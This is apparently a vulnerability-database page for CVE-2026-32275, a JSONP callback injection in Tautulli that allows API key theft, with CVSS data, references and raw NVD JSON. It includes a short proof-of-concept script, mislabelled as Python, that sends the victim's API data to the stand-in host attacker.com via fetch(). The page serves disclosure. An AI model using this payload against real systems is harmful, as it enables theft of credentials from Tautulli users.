CVE-2026-32275

Description

Tautulli is a Python based monitoring and tracking tool for Plex Media Server. From version 1.3.10 to before version 2.17.0, an unsanitized JSONP callback parameter allows cross-origin script injection and API key theft. This issue has been patched in version 2.17.0.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* - VULNERABLE

Tautulli 1.3.10 至 2.17.0 之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-32275
// Demonstrates JSONP callback injection to steal API keys

// Malicious payload definition
var maliciousCallback = 'function(data){ fetch(\'https://attacker.com/steal?c=\' + encodeURIComponent(JSON.stringify(data))); }';

// Construct the vulnerable URL with the unsanitized callback parameter
// The target endpoint should be a JSONP-enabled API endpoint (e.g., get_api_key)
var targetUrl = 'http://target-tautulli-instance/api/v2?cmd=get_api_key&callback=' + encodeURIComponent(maliciousCallback);

// Simulate the victim visiting the link or script inclusion
console.log("Attacker would send victim to:", targetUrl);

// In a real attack, this would be injected via <script src="...">
var script = document.createElement('script');
script.src = targetUrl;
document.body.appendChild(script);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32275
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32275
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32275/
[4] VulDB https://vuldb.com/cve/CVE-2026-32275
[5] https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0
[6] https://github.com/Tautulli/Tautulli/security/advisories/GHSA-95mg-wpqw-9qxh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32275", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:21.980", "lastModified": "2026-04-02T15:38:25.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tautulli is a Python based monitoring and tracking tool for Plex Media Server. From version 1.3.10 to before version 2.17.0, an unsanitized JSONP callback parameter allows cross-origin script injection and API key theft. This issue has been patched in version 2.17.0."}, {"lang": "es", "value": "Tautulli es una herramienta de monitoreo y seguimiento basada en Python para Plex Media Server. Desde la versión 1.3.10 hasta antes de la versión 2.17.0, un parámetro de callback JSONP no saneado permite la inyección de scripts de origen cruzado y el robo de claves API. Este problema ha sido parcheado en la versión 2.17.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.3.10", "versionEndExcluding": "2.17.0", "matchCriteriaId": "E6AF7C20-CCD3-4755-B349-6579668258D6"}]}]}], "references": [{"url": "https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Tautulli/Tautulli/security/advisories/GHSA-95mg-wpqw-9qxh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}